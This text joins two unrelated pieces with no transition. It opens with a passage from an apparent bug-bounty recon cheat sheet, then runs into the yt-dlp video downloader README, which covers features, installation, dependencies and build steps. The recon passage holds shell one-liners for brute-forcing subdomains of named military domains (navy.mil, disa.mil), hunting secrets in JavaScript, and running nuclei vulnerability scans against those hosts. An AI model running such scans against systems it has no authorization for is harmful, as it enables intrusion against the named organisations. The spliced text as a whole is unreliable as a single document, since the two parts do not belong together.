file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u ``` ### Find subdomains and Secrets with jsubfinder - [Explained command] ```bash cat subdomsains.txt | httpx --silent | jsubfinder search -s ``` ### Search domains to Range-IPS. - [Explained command] ```bash cat dod1 | awk '{print $1}' | xargs -I@ sh -c 'prips @ | hakrevdns -r 1.1.1.1' | awk '{print $2}' | sed -r 's/.$//g' | httpx -silent -timeout 25 | anew ``` ### Search new's domains using dnsgen. - [Explained command] ```bash xargs -a army1 -I@ sh -c 'echo @' | dnsgen - | httpx -silent -threads 10000 | anew newdomain ``` ### List ips, domain extract, using amass + wordlist - [Explained command] ```bash amass enum -src -ip -active -brute -d navy.mil -o domain ; cat domain | cut -d']' -f 2 | awk '{print $1}' | sort -u > hosts-amass.txt ; cat domain | cut -d']' -f2 | awk '{print $2}' | tr ',' '\n' | sort -u > ips-amass.txt ; curl -s "https://crt.sh/?q=%.navy.mil&output=json" | jq '.[].name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u > hosts-crtsh.txt ; sed 's/$/.navy.mil/' dns-Jhaddix.txt_cleaned > hosts-wordlist.txt ; cat hosts-amass.txt hosts-crtsh.txt hosts-wordlist.txt | sort -u > hosts-all.txt ``` ### Search domains using amass and search vul to nuclei. - [Explained command] ```bash amass enum -passive -norecursive -d disa.mil -o domain ; httpx -l domain -silent -threads 10 | nuclei -t PATH -o result -timeout 30 ``` ### Verify to cert using openssl. - [Explained command] ```bash sed -ne 's/^\( *\)Subject:/\1/p;/X509v3 Subject Alternative Name/{ N;s/^.*\n//;:a;s/^\( *\)\(.*\), /\1\2\n\1/;ta;p;q; }' < <( openssl x509 -noout -text -in <( openssl s_client -ign_eof 2>/dev/null <<<$'HEAD / HTTP/1.0\r\n\r' \ -connect hackerone.com:443 ) ) ``` ### Search domains using openssl to cert. - [Explained command] ```bash xargs -a recursivedomain -P50 -I@ sh -c 'openssl s_client -connect @:443 2>&1 '| sed -E -e 's/[[:blank:]]+/\n/g' | httpx -silent -threads 1000 | anew ``` ### Search to Hackers. - [Censys](https://censys.io) - [Spyce](https://spyce.com) - [Shodan](https://shodan.io) - [Viz Grey](https://viz.greynoise.io) - [Zoomeye](https://zoomeye.org) - [Onyphe](https://onyphe.io) - [Wigle](https://wigle.net) - [Intelx](https://intelx.io) - [Fofa](https://fofa.so) - [Hunter](https://hunter.io) - [Zorexeye](https://zorexeye.com) - [Pulsedive](https://pulsedive.com) - [Netograph](https://netograph.io) - [Vigilante](https://vigilante.pw) - [Pipl](https://pipl.com) - [Abuse](https://abuse.ch) - [Cert-sh](https://cert.sh) - [Maltiverse](https://maltiverse.com/search) - [Insecam](https://insecam.org) - [Anubis](https://https://jldc.me/anubis/subdomains/att.com) - [Dns Dumpster](https://dnsdumpster.com) - [PhoneBook](https://phonebook.cz) - [Inquest](https://labs.inquest.net) - [Scylla](https://scylla.sh) # Project [![made-with-Go](https://img.shields.io/badge/Made%20with-Go-1f425f.svg)](http://golang.org) [![made-with-bash](https://img.shields.io/badge/Made%20with-Bash-1f425f.svg)](https://www.gnu.org/software/bash/) [![Open Source? Yes!](https://badgen.net/badge/Open%20Source%20%3F/Yes%21/blue?icon=github)](https://github.com/Naereen/badges/) [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/KingOfTipsBugBounty) <a href="https://www.buymeacoffee.com/OFJAAAH" target="_blank"><img src="https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: 20px !important;width: 50px !important;box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;-webkit-box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;" ></a>
<!-- MANPAGE: BEGIN EXCLUDED SECTION --> <div align="center"> [![YT-DLP](https://raw.githubusercontent.com/yt-dlp/yt-dlp/master/.github/banner.svg)](#readme) [![Release version](https://img.shields.io/github/v/release/yt-dlp/yt-dlp?color=brightgreen&label=Download&style=for-the-badge)](#installation "Installation") [![PyPi](https://img.shields.io/badge/-PyPi-blue.svg?logo=pypi&labelColor=555555&style=for-the-badge)](https://pypi.org/project/yt-dlp "PyPi") [![Donate](https://img.shields.io/badge/_-Donate-red.svg?logo=githubsponsors&labelColor=555555&style=for-the-badge)](Collaborators.md#collaborators "Donate") [![Matrix](https://img.shields.io/matrix/yt-dlp:matrix.org?color=brightgreen&labelColor=555555&label=&logo=element&style=for-the-badge)](https://matrix.to/#/#yt-dlp:matrix.org "Matrix") [![Discord](https://img.shields.io/discord/807245652072857610?color=blue&labelColor=555555&label=&logo=discord&style=for-the-badge)](https://discord.gg/H5MNcFW63r "Discord") [![Supported Sites](https://img.shields.io/badge/-Supported_Sites-brightgreen.svg?style=for-the-badge)](supportedsites.md "Supported Sites") [![License: Unlicense](https://img.shields.io/badge/-Unlicense-blue.svg?style=for-the-badge)](LICENSE "License") [![CI Status](https://img.shields.io/github/actions/workflow/status/yt-dlp/yt-dlp/core.yml?branch=master&label=Tests&style=for-the-badge)](https://github.com/yt-dlp/yt-dlp/actions "CI Status") [![Commits](https://img.shields.io/github/commit-activity/m/yt-dlp/yt-dlp?label=commits&style=for-the-badge)](https://github.com/yt-dlp/yt-dlp/commits "Commit History") [![Last Commit](https://img.shields.io/github/last-commit/yt-dlp/yt-dlp/master?label=&style=for-the-badge&display_timestamp=committer)](https://github.com/yt-dlp/yt-dlp/pulse/monthly "Last activity") </div> <!-- MANPAGE: END EXCLUDED SECTION --> yt-dlp is a [youtube-dl](https://github.com/ytdl-org/youtube-dl) fork based on the now inactive [youtube-dlc](https://github.com/blackjack4494/yt-dlc). The main focus of this project is adding new features and patches while also keeping up to date with the original project <!-- MANPAGE: MOVE "USAGE AND OPTIONS" SECTION HERE --> <!-- MANPAGE: BEGIN EXCLUDED SECTION --> * [NEW FEATURES](#new-features) * [Differences in default behavior](#differences-in-default-behavior) * [INSTALLATION](#installation) * [Detailed instructions](https://github.com/yt-dlp/yt-dlp/wiki/Installation) * [Update](#update) * [Release Files](#release-files) * [Dependencies](#dependencies) * [Compile](#compile) * [USAGE AND OPTIONS](#usage-and-options) * [General Options](#general-options) * [Network Options](#network-options) * [Geo-restriction](#geo-restriction) * [Video Selection](#video-selection) * [Download Options](#download-options) * [Filesystem Options](#filesystem-options) * [Thumbnail Options](#thumbnail-options) * [Internet Shortcut Options](#internet-shortcut-options) * [Verbosity and Simulation Options](#verbosity-and-simulation-options) * [Workarounds](#workarounds) * [Video Format Options](#video-format-options) * [Subtitle Options](#subtitle-options) * [Authentication Options](#authentication-options) * [Post-processing Options](#post-processing-options) * [SponsorBlock Options](#sponsorblock-options) * [Extractor Options](#extractor-options) * [CONFIGURATION](#configuration) * [Configuration file encoding](#configuration-file-encoding) * [Authentication with netrc](#authentication-with-netrc) * [Notes about environment variables](#notes-about-environment-variables) * [OUTPUT TEMPLATE](#output-template) * [Output template examples](#output-template-examples) * [FORMAT SELECTION](#format-selection) * [Filtering Formats](#filtering-formats) * [Sorting Formats](#sorting-formats) * [Format Selection examples](#format-selection-examples) * [MODIFYING METADATA](#modifying-metadata) * [Modifying metadata examples](#modifying-metadata-examples) * [EXTRACTOR ARGUMENTS](#extractor-arguments) * [PLUGINS](#plugins) * [Installing Plugins](#installing-plugins) * [Developing Plugins](#developing-plugins) * [EMBEDDING YT-DLP](#embedding-yt-dlp) * [Embedding examples](#embedding-examples) * [DEPRECATED OPTIONS](#deprecated-options) * [CONTRIBUTING](CONTRIBUTING.md#contributing-to-yt-dlp) * [Opening an Issue](CONTRIBUTING.md#opening-an-issue) * [Developer Instructions](CONTRIBUTING.md#developer-instructions) * [WIKI](https://github.com/yt-dlp/yt-dlp/wiki) * [FAQ](https://github.com/yt-dlp/yt-dlp/wiki/FAQ) <!-- MANPAGE: END EXCLUDED SECTION --> # NEW FEATURES * Forked from [**yt-dlc@f9401f2**](https://github.com/blackjack4494/yt-dlc/commit/f9401f2a91987068139c5f757b12fc711d4c0cee) and merged with [**youtube-dl@42f2d4**](https://github.com/ytdl-org/youtube-dl/commit/07af47960f3bb262ead02490ce65c8c45c01741e) ([exceptions](https://github.com/yt-dlp/yt-dlp/issues/21)) * **[SponsorBlock Integration](#sponsorblock-options)**: You can mark/remove sponsor sections in YouTube videos by utilizing the [SponsorBlock](https://sponsor.ajay.app) API * **[Format Sorting](#sorting-formats)**: The default format sorting options have been changed so that higher resolution and better codecs will be now preferred instead of simply using larger bitrate. Furthermore, you can now specify the sort order using `-S`. This allows for much easier format selection than what is possible by simply using `--format` ([examples](#format-selection-examples)) * **Merged with animelover1984/youtube-dl**: You get most of the features and improvements from [animelover1984/youtube-dl](https://github.com/animelover1984/youtube-dl) including `--write-comments`, `BiliBiliSearch`, `BilibiliChannel`, Embedding thumbnail in mp4/ogg/opus, playlist infojson etc. Note that NicoNico livestreams are not available. See [#31](https://github.com/yt-dlp/yt-dlp/pull/31) for details. * **YouTube improvements**: * Supports Clips, Stories (`ytstories:<channel UCID>`), Search (including filters)**\***, YouTube Music Search, Channel-specific search, Search prefixes (`ytsearch:`, `ytsearchdate:`)**\***, Mixes, and Feeds (`:ytfav`, `:ytwatchlater`, `:ytsubs`, `:ythistory`, `:ytrec`, `:ytnotif`) * Fix for [n-sig based throttling](https://github.com/ytdl-org/youtube-dl/issues/29326) **\*** * Supports some (but not all) age-gated content without cookies * Download livestreams from the start using `--live-from-start` (*experimental*) * `255kbps` audio is extracted (if available) from YouTube Music when premium cookies are given * Channel URLs download all uploads of the channel, including shorts and live * **Cookies from browser**: Cookies can be automatically extracted from all major web browsers using `--cookies-from-browser BROWSER[+KEYRING][:PROFILE][::CONTAINER]` * **Download time range**: Videos can be downloaded partially based on either timestamps or chapters using `--download-sections` * **Split video by chapters**: Videos can be split into multiple files based on chapters using `--split-chapters` * **Multi-threaded fragment downloads**: Download multiple fragments of m3u8/mpd videos in parallel. Use `--concurrent-fragments` (`-N`) option to set the number of threads used * **Aria2c with HLS/DASH**: You can use `aria2c` as the external downloader for DASH(mpd) and HLS(m3u8) formats * **New and fixed extractors**: Many new extractors have been added and a lot of existing ones have been fixed. See the [changelog](Changelog.md) or the [list of supported sites](supportedsites.md) * **New MSOs**: Philo, Spectrum, SlingTV, Cablevision, RCN etc. * **Subtitle extraction from manifests**: Subtitles can be extracted from streaming media manifests. See [commit/be6202f](https://github.com/yt-dlp/yt-dlp/commit/be6202f12b97858b9d716e608394b51065d0419f) for details * **Multiple paths and output templates**: You can give different [output templates](#output-template) and download paths for different types of files. You can also set a temporary path where intermediary files are downloaded to using `--paths` (`-P`) * **Portable Configuration**: Configuration files are automatically loaded from the home and root directories. See [CONFIGURATION](#configuration) for details * **Output template improvements**: Output templates can now have date-time formatting, numeric offsets, object traversal etc. See [output template](#output-template) for details. Even more advanced operations can also be done with the help of `--parse-metadata` and `--replace-in-metadata` * **Other new options**: Many new options have been added such as `--alias`, `--print`, `--concat-playlist`, `--wait-for-video`, `--retry-sleep`, `--sleep-requests`, `--convert-thumbnails`, `--force-download-archive`, `--force-overwrites`, `--break-match-filter` etc * **Improvements**: Regex and other operators in `--format`/`--match-filter`, multiple `--postprocessor-args` and `--downloader-args`, faster archive checking, more [format selection options](#format-selection), merge multi-video/audio, multiple `--config-locations`, `--exec` at different stages, etc * **Plugins**: Extractors and PostProcessors can be loaded from an external file. See [plugins](#plugins) for details * **Self updater**: The releases can be updated using `yt-dlp -U`, and downgraded using `--update-to` if required * **Nightly builds**: [Automated nightly builds](#update-channels) can be used with `--update-to nightly` See [changelog](Changelog.md) or [commits](https://github.com/yt-dlp/yt-dlp/commits) for the full list of changes Features marked with a **\*** have been back-ported to youtube-dl ### Differences in default behavior Some of yt-dlp's default options are different from that of youtube-dl and youtube-dlc: * yt-dlp supports only [Python 3.7+](## "Windows 7"), and *may* remove support for more versions as they [become EOL](https://devguide.python.org/versions/#python-release-cycle); while [youtube-dl still supports Python 2.6+ and 3.2+](https://github.com/ytdl-org/youtube-dl/issues/30568#issue-1118238743) * The options `--auto-number` (`-A`), `--title` (`-t`) and `--literal` (`-l`), no longer work. See [removed options](#Removed) for details * `avconv` is not supported as an alternative to `ffmpeg` * yt-dlp stores config files in slightly different locations to youtube-dl. See [CONFIGURATION](#configuration) for a list of correct locations * The default [output template](#output-template) is `%(title)s [%(id)s].%(ext)s`. There is no real reason for this change. This was changed before yt-dlp was ever made public and now there are no plans to change it back to `%(title)s-%(id)s.%(ext)s`. Instead, you may use `--compat-options filename` * The default [format sorting](#sorting-formats) is different from youtube-dl and prefers higher resolution and better codecs rather than higher bitrates. You can use the `--format-sort` option to change this to any order you prefer, or use `--compat-options format-sort` to use youtube-dl's sorting order * The default format selector is `bv*+ba/b`. This means that if a combined video + audio format that is better than the best video-only format is found, the former will be preferred. Use `-f bv+ba/b` or `--compat-options format-spec` to revert this * Unlike youtube-dlc, yt-dlp does not allow merging multiple audio/video streams into one file by default (since this conflicts with the use of `-f bv*+ba`). If needed, this feature must be enabled using `--audio-multistreams` and `--video-multistreams`. You can also use `--compat-options multistreams` to enable both * `--no-abort-on-error` is enabled by default. Use `--abort-on-error` or `--compat-options abort-on-error` to abort on errors instead * When writing metadata files such as thumbnails, description or infojson, the same information (if available) is also written for playlists. Use `--no-write-playlist-metafiles` or `--compat-options no-playlist-metafiles` to not write these files * `--add-metadata` attaches the `infojson` to `mkv` files in addition to writing the metadata when used with `--write-info-json`. Use `--no-embed-info-json` or `--compat-options no-attach-info-json` to revert this * Some metadata are embedded into different fields when using `--add-metadata` as compared to youtube-dl. Most notably, `comment` field contains the `webpage_url` and `synopsis` contains the `description`. You can [use `--parse-metadata`](#modifying-metadata) to modify this to your liking or use `--compat-options embed-metadata` to revert this * `playlist_index` behaves differently when used with options like `--playlist-reverse` and `--playlist-items`. See [#302](https://github.com/yt-dlp/yt-dlp/issues/302) for details. You can use `--compat-options playlist-index` if you want to keep the earlier behavior * The output of `-F` is listed in a new format. Use `--compat-options list-formats` to revert this * Live chats (if available) are considered as subtitles. Use `--sub-langs all,-live_chat` to download all subtitles except live chat. You can also use `--compat-options no-live-chat` to prevent any live chat/danmaku from downloading * YouTube channel URLs download all uploads of the channel. To download only the videos in a specific tab, pass the tab's URL. If the channel does not show the requested tab, an error will be raised. Also, `/live` URLs raise an error if there are no live videos instead of silently downloading the entire channel. You may use `--compat-options no-youtube-channel-redirect` to revert all these redirections * Unavailable videos are also listed for YouTube playlists. Use `--compat-options no-youtube-unavailable-videos` to remove this * The upload dates extracted from YouTube are in UTC [when available](https://github.com/yt-dlp/yt-dlp/blob/89e4d86171c7b7c997c77d4714542e0383bf0db0/yt_dlp/extractor/youtube.py#L3898-L3900). Use `--compat-options no-youtube-prefer-utc-upload-date` to prefer the non-UTC upload date. * If `ffmpeg` is used as the downloader, the downloading and merging of formats happen in a single step when possible. Use `--compat-options no-direct-merge` to revert this * Thumbnail embedding in `mp4` is done with mutagen if possible. Use `--compat-options embed-thumbnail-atomicparsley` to force the use of AtomicParsley instead * Some internal metadata such as filenames are removed by default from the infojson. Use `--no-clean-infojson` or `--compat-options no-clean-infojson` to revert this * When `--embed-subs` and `--write-subs` are used together, the subtitles are written to disk and also embedded in the media file. You can use just `--embed-subs` to embed the subs and automatically delete the separate file. See [#630 (comment)](https://github.com/yt-dlp/yt-dlp/issues/630#issuecomment-893659460) for more info. `--compat-options no-keep-subs` can be used to revert this * `certifi` will be used for SSL root certificates, if installed. If you want to use system certificates (e.g. self-signed), use `--compat-options no-certifi` * yt-dlp's sanitization of invalid characters in filenames is different/smarter than in youtube-dl. You can use `--compat-options filename-sanitization` to revert to youtube-dl's behavior * yt-dlp tries to parse the external downloader outputs into the standard progress output if possible (Currently implemented: [~~aria2c~~](https://github.com/yt-dlp/yt-dlp/issues/5931)). You can use `--compat-options no-external-downloader-progress` to get the downloader output as-is * yt-dlp versions between 2021.09.01 and 2023.01.02 applies `--match-filter` to nested playlists. This was an unintentional side-effect of [8f18ac](https://github.com/yt-dlp/yt-dlp/commit/8f18aca8717bb0dd49054555af8d386e5eda3a88) and is fixed in [d7b460](https://github.com/yt-dlp/yt-dlp/commit/d7b460d0e5fc710950582baed2e3fc616ed98a80). Use `--compat-options playlist-match-filter` to revert this For ease of use, a few more compat options are available: * `--compat-options all`: Use all compat options (Do NOT use) * `--compat-options youtube-dl`: Same as `--compat-options all,-multistreams,-playlist-match-filter` * `--compat-options youtube-dlc`: Same as `--compat-options all,-no-live-chat,-no-youtube-channel-redirect,-playlist-match-filter` * `--compat-options 2021`: Same as `--compat-options 2022,no-certifi,filename-sanitization,no-youtube-prefer-utc-upload-date` * `--compat-options 2022`: Same as `--compat-options playlist-match-filter,no-external-downloader-progress`. Use this to enable all future compat options # INSTALLATION <!-- MANPAGE: BEGIN EXCLUDED SECTION --> [![Windows](https://img.shields.io/badge/-Windows_x64-blue.svg?style=for-the-badge&logo=windows)](https://github.com/yt-dlp/yt-dlp/releases/latest/download/yt-dlp.exe) [![Unix](https://img.shields.io/badge/-Linux/BSD-red.svg?style=for-the-badge&logo=linux)](https://github.com/yt-dlp/yt-dlp/releases/latest/download/yt-dlp) [![MacOS](https://img.shields.io/badge/-MacOS-lightblue.svg?style=for-the-badge&logo=apple)](https://github.com/yt-dlp/yt-dlp/releases/latest/download/yt-dlp_macos) [![PyPi](https://img.shields.io/badge/-PyPi-blue.svg?logo=pypi&labelColor=555555&style=for-the-badge)](https://pypi.org/project/yt-dlp) [![Source Tarball](https://img.shields.io/badge/-Source_tar-green.svg?style=for-the-badge)](https://github.com/yt-dlp/yt-dlp/releases/latest/download/yt-dlp.tar.gz) [![Other variants](https://img.shields.io/badge/-Other-grey.svg?style=for-the-badge)](#release-files) [![All versions](https://img.shields.io/badge/-All_Versions-lightgrey.svg?style=for-the-badge)](https://github.com/yt-dlp/yt-dlp/releases) <!-- MANPAGE: END EXCLUDED SECTION --> You can install yt-dlp using [the binaries](#release-files), [pip](https://pypi.org/project/yt-dlp) or one using a third-party package manager. See [the wiki](https://github.com/yt-dlp/yt-dlp/wiki/Installation) for detailed instructions ## UPDATE You can use `yt-dlp -U` to update if you are using the [release binaries](#release-files) If you [installed with pip](https://github.com/yt-dlp/yt-dlp/wiki/Installation#with-pip), simply re-run the same command that was used to install the program For other third-party package managers, see [the wiki](https://github.com/yt-dlp/yt-dlp/wiki/Installation#third-party-package-managers) or refer their documentation <a id="update-channels"/> There are currently two release channels for binaries, `stable` and `nightly`. `stable` is the default channel, and many of its changes have been tested by users of the nightly channel. The `nightly` channel has releases built after each push to the master branch, and will have the most recent fixes and additions, but also have more risk of regressions. They are available in [their own repo](https://github.com/yt-dlp/yt-dlp-nightly-builds/releases). When using `--update`/`-U`, a release binary will only update to its current channel. `--update-to CHANNEL` can be used to switch to a different channel when a newer version is available. `--update-to [CHANNEL@]TAG` can also be used to upgrade or downgrade to specific tags from a channel. You may also use `--update-to <repository>` (`<owner>/<repository>`) to update to a channel on a completely different repository. Be careful with what repository you are updating to though, there is no verification done for binaries from different repositories. Example usage: * `yt-dlp --update-to nightly` change to `nightly` channel and update to its latest release * `yt-dlp --update-to [email protected]` upgrade/downgrade to release to `stable` channel tag `2023.02.17` * `yt-dlp --update-to 2023.01.06` upgrade/downgrade to tag `2023.01.06` if it exists on the current channel * `yt-dlp --update-to example/[email protected]` upgrade/downgrade to the release from the `example/yt-dlp` repository, tag `2023.03.01` <!-- MANPAGE: BEGIN EXCLUDED SECTION --> ## RELEASE FILES #### Recommended File|Description :---|:--- [yt-dlp](https://github.com/yt-dlp/yt-dlp/releases/latest/download/yt-dlp)|Platform-independent [zipimport](https://docs.python.org/3/library/zipimport.html) binary. Needs Python (recommended for **Linux/BSD**) [yt-dlp.exe](https://github.com/yt-dlp/yt-dlp/releases/latest/download/yt-dlp.exe)|Windows (Win7 SP1+) standalone x64 binary (recommended for **Windows**) [yt-dlp_macos](https://github.com/yt-dlp/yt-dlp/releases/latest/download/yt-dlp_macos)|Universal MacOS (10.15+) standalone executable (recommended for **MacOS**) #### Alternatives File|Description :---|:--- [yt-dlp_x86.exe](https://github.com/yt-dlp/yt-dlp/releases/latest/download/yt-dlp_x86.exe)|Windows (Vista SP2+) standalone x86 (32-bit) binary [yt-dlp_min.exe](https://github.com/yt-dlp/yt-dlp/releases/latest/download/yt-dlp_min.exe)|Windows (Win7 SP1+) standalone x64 binary built with `py2exe`<br/> ([Not recommended](#standalone-py2exe-builds-windows)) [yt-dlp_linux](https://github.com/yt-dlp/yt-dlp/releases/latest/download/yt-dlp_linux)|Linux standalone x64 binary [yt-dlp_linux.zip](https://github.com/yt-dlp/yt-dlp/releases/latest/download/yt-dlp_linux.zip)|Unpackaged Linux executable (no auto-update) [yt-dlp_linux_armv7l](https://github.com/yt-dlp/yt-dlp/releases/latest/download/yt-dlp_linux_armv7l)|Linux standalone armv7l (32-bit) binary [yt-dlp_linux_aarch64](https://github.com/yt-dlp/yt-dlp/releases/latest/download/yt-dlp_linux_aarch64)|Linux standalone aarch64 (64-bit) binary [yt-dlp_win.zip](https://github.com/yt-dlp/yt-dlp/releases/latest/download/yt-dlp_win.zip)|Unpackaged Windows executable (no auto-update) [yt-dlp_macos.zip](https://github.com/yt-dlp/yt-dlp/releases/latest/download/yt-dlp_macos.zip)|Unpackaged MacOS (10.15+) executable (no auto-update) [yt-dlp_macos_legacy](https://github.com/yt-dlp/yt-dlp/releases/latest/download/yt-dlp_macos_legacy)|MacOS (10.9+) standalone x64 executable #### Misc File|Description :---|:--- [yt-dlp.tar.gz](https://github.com/yt-dlp/yt-dlp/releases/latest/download/yt-dlp.tar.gz)|Source tarball [SHA2-512SUMS](https://github.com/yt-dlp/yt-dlp/releases/latest/download/SHA2-512SUMS)|GNU-style SHA512 sums [SHA2-512SUMS.sig](https://github.com/yt-dlp/yt-dlp/releases/latest/download/SHA2-512SUMS.sig)|GPG signature file for SHA512 sums [SHA2-256SUMS](https://github.com/yt-dlp/yt-dlp/releases/latest/download/SHA2-256SUMS)|GNU-style SHA256 sums [SHA2-256SUMS.sig](https://github.com/yt-dlp/yt-dlp/releases/latest/download/SHA2-256SUMS.sig)|GPG signature file for SHA256 sums The public key that can be used to verify the GPG signatures is [available here](https://github.com/yt-dlp/yt-dlp/blob/master/public.key) Example usage: ``` curl -L https://github.com/yt-dlp/yt-dlp/raw/master/public.key | gpg --import gpg --verify SHA2-256SUMS.sig SHA2-256SUMS gpg --verify SHA2-512SUMS.sig SHA2-512SUMS ``` <!-- MANPAGE: END EXCLUDED SECTION --> **Note**: The manpages, shell completion (autocomplete) files etc. are available inside the [source tarball](https://github.com/yt-dlp/yt-dlp/releases/latest/download/yt-dlp.tar.gz) ## DEPENDENCIES Python versions 3.7+ (CPython and PyPy) are supported. Other versions and implementations may or may not work correctly. <!-- Python 3.5+ uses VC++14 and it is already embedded in the binary created <!x-- https://www.microsoft.com/en-us/download/details.aspx?id=26999 --x> On windows, [Microsoft Visual C++ 2010 SP1 Redistributable Package (x86)](https://download.microsoft.com/download/1/6/5/165255E7-1014-4D0A-B094-B6A430A6BFFC/vcredist_x86.exe) is also necessary to run yt-dlp. You probably already have this, but if the executable throws an error due to missing `MSVCR100.dll` you need to install it manually. --> While all the other dependencies are optional, `ffmpeg` and `ffprobe` are highly recommended ### Strongly recommended * [**ffmpeg** and **ffprobe**](https://www.ffmpeg.org) - Required for [merging separate video and audio files](#format-selection) as well as for various [post-processing](#post-processing-options) tasks. License [depends on the build](https://www.ffmpeg.org/legal.html) There are bugs in ffmpeg that causes various issues when used alongside yt-dlp. Since ffmpeg is such an important dependency, we provide [custom builds](https://github.com/yt-dlp/FFmpeg-Builds#ffmpeg-static-auto-builds) with patches for some of these issues at [yt-dlp/FFmpeg-Builds](https://github.com/yt-dlp/FFmpeg-Builds). See [the readme](https://github.com/yt-dlp/FFmpeg-Builds#patches-applied) for details on the specific issues solved by these builds **Important**: What you need is ffmpeg *binary*, **NOT** [the python package of the same name](https://pypi.org/project/ffmpeg) ### Networking * [**certifi**](https://github.com/certifi/python-certifi)\* - Provides Mozilla's root certificate bundle. Licensed under [MPLv2](https://github.com/certifi/python-certifi/blob/master/LICENSE) * [**brotli**](https://github.com/google/brotli)\* or [**brotlicffi**](https://github.com/python-hyper/brotlicffi) - [Brotli](https://en.wikipedia.org/wiki/Brotli) content encoding support. Both licensed under MIT <sup>[1](https://github.com/google/brotli/blob/master/LICENSE) [2](https://github.com/python-hyper/brotlicffi/blob/master/LICENSE) </sup> * [**websockets**](https://github.com/aaugustin/websockets)\* - For downloading over websocket. Licensed under [BSD-3-Clause](https://github.com/aaugustin/websockets/blob/main/LICENSE) ### Metadata * [**mutagen**](https://github.com/quodlibet/mutagen)\* - For `--embed-thumbnail` in certain formats. Licensed under [GPLv2+](https://github.com/quodlibet/mutagen/blob/master/COPYING) * [**AtomicParsley**](https://github.com/wez/atomicparsley) - For `--embed-thumbnail` in `mp4`/`m4a` files when `mutagen`/`ffmpeg` cannot. Licensed under [GPLv2+](https://github.com/wez/atomicparsley/blob/master/COPYING) * [**xattr**](https://github.com/xattr/xattr), [**pyxattr**](https://github.com/iustin/pyxattr) or [**setfattr**](http://savannah.nongnu.org/projects/attr) - For writing xattr metadata (`--xattr`) on **Linux**. Licensed under [MIT](https://github.com/xattr/xattr/blob/master/LICENSE.txt), [LGPL2.1](https://github.com/iustin/pyxattr/blob/master/COPYING) and [GPLv2+](http://git.savannah.nongnu.org/cgit/attr.git/tree/doc/COPYING) respectively ### Misc * [**pycryptodomex**](https://github.com/Legrandin/pycryptodome)\* - For decrypting AES-128 HLS streams and various other data. Licensed under [BSD-2-Clause](https://github.com/Legrandin/pycryptodome/blob/master/LICENSE.rst) * [**phantomjs**](https://github.com/ariya/phantomjs) - Used in extractors where javascript needs to be run. Licensed under [BSD-3-Clause](https://github.com/ariya/phantomjs/blob/master/LICENSE.BSD) * [**secretstorage**](https://github.com/mitya57/secretstorage) - For `--cookies-from-browser` to access the **Gnome** keyring while decrypting cookies of **Chromium**-based browsers on **Linux**. Licensed under [BSD-3-Clause](https://github.com/mitya57/secretstorage/blob/master/LICENSE) * Any external downloader that you want to use with `--downloader` ### Deprecated * [**avconv** and **avprobe**](https://www.libav.org) - Now **deprecated** alternative to ffmpeg. License [depends on the build](https://libav.org/legal) * [**sponskrub**](https://github.com/faissaloo/SponSkrub) - For using the now **deprecated** [sponskrub options](#sponskrub-options). Licensed under [GPLv3+](https://github.com/faissaloo/SponSkrub/blob/master/LICENCE.md) * [**rtmpdump**](http://rtmpdump.mplayerhq.hu) - For downloading `rtmp` streams. ffmpeg can be used instead with `--downloader ffmpeg`. Licensed under [GPLv2+](http://rtmpdump.mplayerhq.hu) * [**mplayer**](http://mplayerhq.hu/design7/info.html) or [**mpv**](https://mpv.io) - For downloading `rstp`/`mms` streams. ffmpeg can be used instead with `--downloader ffmpeg`. Licensed under [GPLv2+](https://github.com/mpv-player/mpv/blob/master/Copyright) To use or redistribute the dependencies, you must agree to their respective licensing terms. The standalone release binaries are built with the Python interpreter and the packages marked with **\*** included. If you do not have the necessary dependencies for a task you are attempting, yt-dlp will warn you. All the currently available dependencies are visible at the top of the `--verbose` output ## COMPILE ### Standalone PyInstaller Builds To build the standalone executable, you must have Python and `pyinstaller` (plus any of yt-dlp's [optional dependencies](#dependencies) if needed). Once you have all the necessary dependencies installed, simply run `pyinst.py`. The executable will be built for the same architecture (x86/ARM, 32/64 bit) as the Python used. python3 -m pip install -U pyinstaller -r requirements.txt python3 devscripts/make_lazy_extractors.py python3 pyinst.py On some systems, you may need to use `py` or `python` instead of `python3`. `pyinst.py` accepts any arguments that can be passed to `pyinstaller`, such as `--onefile/-F` or `--onedir/-D`, which is further [documented here](https://pyinstaller.org/en/stable/usage.html#what-to-generate). **Note**: Pyinstaller versions below 4.4 [do not support](https://github.com/pyinstaller/pyinstaller#requirements-and-tested-platforms) Python installed from the Windows store without using a virtual environment. **Important**: Running `pyinstaller` directly **without** using `pyinst.py` is **not** officially supported. This may or may not work correctly. ### Platform-independent Binary (UNIX) You will need the build tools `python` (3.7+), `zip`, `make` (GNU), `pandoc`\* and `pytest`\*. After installing these, simply run `make`. You can also run `make yt-dlp` instead to compile only the binary without updating any of the additional files. (The build tools marked with **\*** are not needed for this) ### Standalone Py2Exe Builds (Windows) While we provide the option to build with [py2exe](https://www.py2exe.org), it is recommended to build [using PyInstaller](#standalone-pyinstaller-builds) instead since the py2exe builds **cannot contain `pycryptodomex`/`certifi` and needs VC++14** on the target computer to run. If you wish to build it anyway, install Python and py2exe, and then simply run `setup.py py2exe` py -m pip install -U py2exe -r requirements.txt py devscripts/make_lazy_extractors.py py setup.py py2exe ### Related scripts * **`devscripts/update-version.py`** - Update the version number based on current date. * **`devscripts/set-variant.py`** - Set the build variant of the executable. * **`devscripts/make_changelog.py`** - Create a markdown changelog using short commit messages and update `CONTRIBUTORS` file. * **`devscripts/make_lazy_extractors.py`** - Create lazy extractors. Running this before building the binaries (any variant) will improve their startup performance. Set the environment variable `YTDLP_NO_LAZY_EXTRACTORS=1` if you wish to forcefully disable lazy extractor loading. Note: See their `--help` for more info. ### Forking the project If you fork the project on GitHub, you can run your fork's [build workflow](.github/workflows/build.yml) to automatically build the selected version(s) as artifacts. Alternatively, you can run the [release workflow](.github/workflows/release.yml) or enable the [nightly workflow](.github/workflows/release-nightly.yml) to create full (pre-)releases. # USAGE AND OPTIONS <!-- MANPAGE: BEGIN EXCLUDED SECTION --> yt-dlp [OPTIONS] [--] URL [URL...] `Ctrl+F` is your friend :D <!-- MANPAGE: END EXCLUDED SECTION --> <!-- Auto generated --> ## General Options: -h, --help Print this help text and exit --version 